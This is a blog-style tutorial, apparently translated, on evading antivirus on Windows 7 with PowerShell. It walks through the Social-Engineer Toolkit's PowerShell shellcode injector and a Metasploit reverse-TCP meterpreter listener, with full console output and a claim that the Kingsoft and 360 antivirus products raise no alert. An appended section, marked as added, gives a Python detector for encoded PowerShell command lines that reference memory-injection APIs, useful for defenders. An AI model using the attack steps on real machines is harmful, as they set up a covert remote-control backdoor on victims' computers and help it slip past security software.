
AV evasion on Windows 7 with PowerShell (Bypassing using Powershell)

Published: 2018-10-31 16:32  Source: unknown

Windows PowerShell is a command-line shell and scripting environment that lets command-line users and script writers take advantage of the power of the .NET Framework. It introduces a number of very useful new concepts that further extend the knowledge you have gained and the scripts you have written in the Windows command prompt and Windows Script Host environments.
With Windows PowerShell you can move easily from typing commands interactively to creating and running scripts. You can type commands at the Windows PowerShell prompt to find the commands that perform a task, then save those commands to a script or to the history and copy them into a file to use as a script.
Identifying the providers you will use. By identifying the providers installed in PowerShell, you learn what capabilities a default installation offers. A provider exposes data held in different storage locations through one simple access method, as easy as browsing the directory structure of different disks. A provider presents each storage location as a "drive" with a directory tree, a structure users already understand. Just as, to reach the file SETUP.exe in the WIN32 directory on drive D, you click the D: icon in Explorer and then double-click the WIN32 directory, to reach data held in the registry you simply use Set-Location to move to the "REGISTRY" "drive" and then Get-ChildItem to list its child items.

At the BSides security conference, David Kennedy, the author of SET, demonstrated some new antivirus-bypass methods using PowerShell.

Update SET:

root@Dis9Team:/pen/set# svn update

Once inside SET, first choose 1) Social-Engineering Attacks, then 10) Powershell Attack Vectors.


Here you choose the type of backdoor:

   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database

Choose 1) Powershell Alphanumeric Shellcode Injector.


Then wait while it encodes; SET has always produced both 32-bit and 64-bit versions.

set:powershell>1
set> IP address for the payload listener: 5.5.5.2
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
Enter the port number for the reverse [443]: 
[*] Generating x64-based powershell injection code...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection attack and is encoded to bypass execution restriction...
set> Do you want to start the listener now [yes/no]: : yes
set:powershell> Select x86 or x64 victim machine [default: x64]:x64
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***


       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 914 exploits - 527 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
       =[ svn r15684 updated 9 days ago (2012.07.26)

Warning: This copy of the Metasploit Framework was last updated 9 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:

https://community.rapid7.com/docs/DOC-1306

[*] Processing reports/powershell/powershell.rc for ERB directives.
resource (reports/powershell/powershell.rc)> use multi/handler
resource (reports/powershell/powershell.rc)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (reports/powershell/powershell.rc)> set lport 443
lport => 443
resource (reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job.
msf  exploit(handler) > 
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...

The generated backdoor is saved here:

root@Dis9Team:/pen/set/reports/powershell# pwd
/pen/set/reports/powershell
root@Dis9Team:/pen/set/reports/powershell# ls
powershell.rc  x64_powershell_injection.txt  x86_powershell_injection.txt
root@Dis9Team:/pen/set/reports/powershell# cat x64_powershell_injection.txt 
..............
-------- (contents omitted) ----
root@Dis9Team:/pen/set/reports/powershell# 

Next, pick the file that matches the target system's architecture, x86 or x64, and run it.


After it runs, Kingsoft and 360 raise no alarm at all.
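From the defender's side, what this procedure leaves behind on the victim is a hidden, encoded PowerShell invocation whose decoded body binds memory-injection APIs. The following added example (not part of the original post or of SET) decodes -EncodedCommand arguments from process command lines as logged by Event ID 4688 or Sysmon Event 1 and flags decoded scripts that reference those APIs; it goes beyond the page by accepting any abbreviated form of the flag and by handling benign encoded commands and malformed payloads. The indicator list, the `-nop -w hidden -noni -enc` form of the first sample and all sample command lines are constructed assumptions.

```python
import base64
from typing import List, Optional, Tuple

# Win32 / .NET interop names that memory-injection one-liners bind through Add-Type or
# reflection. Assumed indicator list, not taken from SET's generated file.
INJECTION_INDICATORS = ("DllImport", "VirtualAlloc", "CreateThread", "WriteProcessMemory")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand (any prefix such as -e or -enc), else None.
    powershell.exe expects base64 of the UTF-16LE script text, so that is what is decoded."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-")
        if tok.startswith("-") and flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # flag present but the payload is not valid base64 / UTF-16LE
    return None

def find_indicators(script: str) -> List[str]:
    """Case-insensitive match of the indicator names inside a decoded script."""
    return [name for name in INJECTION_INDICATORS if name.lower() in script.lower()]

def scan_cmdlines(cmdlines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (cmdline, decoded_script, indicators) for each encoded invocation that matches."""
    hits = []
    for line in cmdlines:
        decoded = decode_encoded_command(line)
        found = find_indicators(decoded) if decoded is not None else []
        if found:
            hits.append((line, decoded, found))
    return hits

def encode_for_powershell(script: str) -> str:
    # Encode a constructed sample the way powershell.exe expects -EncodedCommand input.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process command lines, as they would appear in Event ID 4688 or Sysmon Event 1.
SAMPLE_CMDLINES = [
    # Hidden, non-interactive, encoded one-liner whose body binds kernel32 injection APIs (sketch).
    "powershell.exe -nop -w hidden -noni -enc "
    + encode_for_powershell('[DllImport("kernel32.dll")] VirtualAlloc ... CreateThread ...'),
    # Benign encoded admin command: decodes cleanly but carries no indicators.
    "powershell.exe -EncodedCommand "
    + encode_for_powershell("Get-Service | Where-Object Status -eq Running"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",  # not encoded
]
```

Calling `scan_cmdlines(SAMPLE_CMDLINES)` returns only the first sample, together with its decoded body and the matched names; feed it real 4688 or Sysmon command-line fields to triage encoded PowerShell in bulk.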



